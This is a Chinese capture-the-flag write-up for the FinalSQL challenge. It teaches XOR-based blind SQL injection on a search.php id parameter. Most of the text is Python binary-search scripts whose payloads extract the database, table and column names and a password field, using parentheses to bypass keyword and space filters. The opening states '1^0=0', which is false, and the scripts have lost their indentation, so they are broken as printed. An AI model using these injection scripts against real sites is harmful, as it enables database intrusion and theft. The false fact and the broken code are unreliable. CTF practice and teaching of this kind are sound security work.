[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)
异或^是一种数学运算,1^1=0、0^0=0、1^0=0,可知,当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真。所以^可以用来进行sql注入,并且1^1^1=1、1^0^1=0。
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第1张图片](http://img.e-com-net.com/image/info8/f5237e80b5ac4d22a5b713f8f3406757.jpg)
题目进去之后,还是一个输入框,但是不管输入什么都被检测了,看来输入框处是不会存在注入点了。我们可以发现,页面中多出来了五个数字,随便点击一个,发现URL发生了变化:
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第2张图片](http://img.e-com-net.com/image/info8/7336bdcbafbf4002890b21082aaf72b7.jpg)
猜想id可能是注入点,接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。当我们输入id=1^1时,回显"Error",因为1^1=0了,而id没有0这个值;
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第3张图片](http://img.e-com-net.com/image/info8/7106083b539a4338a59fae3291e4edbd.jpg)
当我们输入id=1^0时,回显"NO! Not this! Click others~~~",因为1^0=1,id存在1这个值,也就正常显示了。
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第4张图片](http://img.e-com-net.com/image/info8/9fc2ec688ac04fcd8d5e65237efa3b3f.jpg)
由此可知,为整型的sql注入。我们接下来用^来代替or进行盲注。我们的payload原理如下:
爆数据库名:
id=1^(ascii(substr(database(),1,1))>100)
如果ascii(substr(database(),1,1))>100为真,则返回1,与前面的1做异或运算就会得到0,页面显示Error。如果ascii(substr(database(),1,1))>100为假,则返回0,与前面的1做异或就会得到1,页面显示"NO! Not this! Click others~~~"。
利用这个原理我们写脚本。
报数据库:
import requests
url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
#payload = 'http://d63d924a-88e3-4036-b463-9fc6a00f4fef.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
payload = "http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))>%d)" %(i,mid)
res = requests.get(url=payload)
if 'ERROR' in res.text: # 为真时,即判断正确的时候的条件
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第5张图片](http://img.e-com-net.com/image/info8/0210352fe5e54de99c17e380e97412f0.jpg)
得到数据库名为geek。
爆表名:
(由于过滤了空格和/**/,我们可以用括号来绕过)
import requests
url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
#payload = 'http://d63d924a-88e3-4036-b463-9fc6a00f4fef.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
payload = "http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php?id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)" %(i,mid)
res = requests.get(url=payload)
if 'ERROR' in res.text:
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第6张图片](http://img.e-com-net.com/image/info8/d04bd66f1b9a4e17878c20bd60fe5307.jpg)
得到一个Flaaaaag表很可疑,我们爆一下他的字段:
import requests
url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
#payload = 'http://d63d924a-88e3-4036-b463-9fc6a00f4fef.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
payload = "http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='Flaaaaag')),%d,1))>%d)" %(i,mid)
res = requests.get(url=payload)
if 'ERROR' in res.text:
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第7张图片](http://img.e-com-net.com/image/info8/aa2b26830e6441888437be449a445566.jpg)
查看fl4gawsl字段:
import requests
url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
#payload = 'http://d63d924a-88e3-4036-b463-9fc6a00f4fef.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
payload = "http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php?id=1^(ascii(substr((select(group_concat(fl4gawsl))from(Flaaaaag)),%d,1))>%d)" %(i,mid)
res = requests.get(url=payload)
if 'ERROR' in res.text:
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
wtf???被骗了?
只能看看F1naI1y表了:
import requests
url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
#payload = 'http://d63d924a-88e3-4036-b463-9fc6a00f4fef.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
payload = "http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php?id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)" %(i,mid)
res = requests.get(url=payload)
if 'ERROR' in res.text:
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第8张图片](http://img.e-com-net.com/image/info8/3331f472b00e4223b45ef874268609be.png)
发现password字段,爆密码:
import requests
url = 'http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php'
flag = ''
for i in range(1,250):
low = 32
high = 128
mid = (low+high)//2
while(low<high):
#payload = 'http://d63d924a-88e3-4036-b463-9fc6a00f4fef.node3.buuoj.cn/search.php?id=1^(ascii(substr(database(),%d,1))=%d)#' %(i,mid)
payload = "http://c088ed7a-d550-43bc-8ded-49adcdc1cfe5.node3.buuoj.cn/search.php?id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" %(i,mid)
res = requests.get(url=payload)
if 'ERROR' in res.text:
low = mid+1
else:
high = mid
mid = (low+high)//2
if(mid ==32 or mid ==127):
break
flag = flag+chr(mid)
print(flag)
终于得到flag:
![[极客大挑战 2019]FinalSQL(^异或注入、二分法盲注脚本)_第9张图片](http://img.e-com-net.com/image/info8/ed32e8de05f24410a423bf2cde20464e.jpg)